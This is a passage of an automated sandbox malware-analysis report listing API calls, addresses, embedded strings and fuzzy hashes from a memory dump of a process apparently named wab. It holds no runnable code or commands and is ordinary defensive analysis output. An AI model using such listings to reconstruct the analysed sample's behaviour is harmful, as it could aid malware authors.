                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2618321458-3614832568
                                                            • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                            • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004185FC
                                                            • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 0041860A
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00418650
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@AttributesFilememset
                                                            • String ID:
                                                            • API String ID: 776155459-0
                                                            • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                            • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                            • malloc.MSVCRT ref: 00417524
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417544
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 00417562
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@ByteCharMultiWide$ApisFilemalloc
                                                            • String ID:
                                                            • API String ID: 2308052813-0
                                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0041822B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: PathTemp$??3@
                                                            • String ID: %s\etilqs_$etilqs_
                                                            • API String ID: 1589464350-1420421710
                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040FDD5
                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT ref: 00414EFC
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                            • API String ID: 1775345501-2769808009
                                                            • Opcode ID: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                            • Opcode Fuzzy Hash: 3766bef419d6113f501c5e442c1acc564cf9e92440af78075bbd4ce4ba4e02a5
                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0041477F
                                                            • wcscpy.MSVCRT ref: 0041479A
                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                            • String ID: General
                                                            • API String ID: 999786162-26480598
                                                            • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                            • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessage_snwprintf
                                                            • String ID: Error$Error %d: %s
                                                            • API String ID: 313946961-1552265934
                                                            • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                            • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: foreign key constraint failed$new$oid$old
                                                            • API String ID: 0-1953309616
                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 3510742995-272990098
                                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: gj
                                                            • API String ID: 1297977491-4203073231
                                                            • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                            • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                                                              • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                            • Opcode Fuzzy Hash: 2f3d1febb6567f1c65e15d924abe411323abe179da33a997404dc77986320892
                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                            • malloc.MSVCRT ref: 004174BD
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                                                            • String ID:
                                                            • API String ID: 2903831945-0
                                                            • Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                            • Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetParent.USER32(?), ref: 0040D453
                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                            • memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                            • String ID:
                                                            • API String ID: 1471605966-0
                                                            • Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                            • Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0044475F
                                                            • wcscat.MSVCRT ref: 0044476E
                                                            • wcscat.MSVCRT ref: 0044477F
                                                            • wcscat.MSVCRT ref: 0044478E
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                            • String ID: \StringFileInfo\
                                                            • API String ID: 102104167-2245444037
                                                            • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                            • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$??3@
                                                            • String ID: g4@
                                                            • API String ID: 3314356048-2133833424
                                                            • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                            • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                            • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                            • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: _memicmpwcslen
                                                            • String ID: @@@@$History
                                                            • API String ID: 1872909662-685208920
                                                            • Opcode ID: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                            • Opcode Fuzzy Hash: 3ad5d2c3b3ee2b52e24687d5059668d8296d000cbab4a3a90200832106c23410
                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 004100FB
                                                            • memset.MSVCRT ref: 00410112
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 00410141
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$_snwprintf_wcslwrwcscpy
                                                            • String ID: </%s>
                                                            • API String ID: 3400436232-259020660
                                                            • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                            • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                            • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                            • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • memset.MSVCRT ref: 0040D58D
                                                            • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                            • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ChildEnumTextWindowWindowsmemset
                                                            • String ID: caption
                                                            • API String ID: 1523050162-4135340389
                                                            • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                            • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                            • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                            • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                              • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                            • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                            • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                            • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                            • String ID: MS Sans Serif
                                                            • API String ID: 210187428-168460110
                                                            • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                            • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                            • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                            • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcsicmpmemset
                                                            • String ID: edit
                                                            • API String ID: 2747424523-2167791130
                                                            • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                            • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                                                            • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                                                            • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(00000000,shlwapi.dll), ref: 00414E2B
                                                            • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                            • String ID: SHAutoComplete$shlwapi.dll
                                                            • API String ID: 3150196962-1506664499
                                                            • Opcode ID: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                            • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                                                            • Opcode Fuzzy Hash: cdcb965da711456ca4b51fb43941328c5d6cb5423f9048b51d1f1fd4f659d43f
                                                            • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.1716172486.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memcmp
                                                            • String ID:
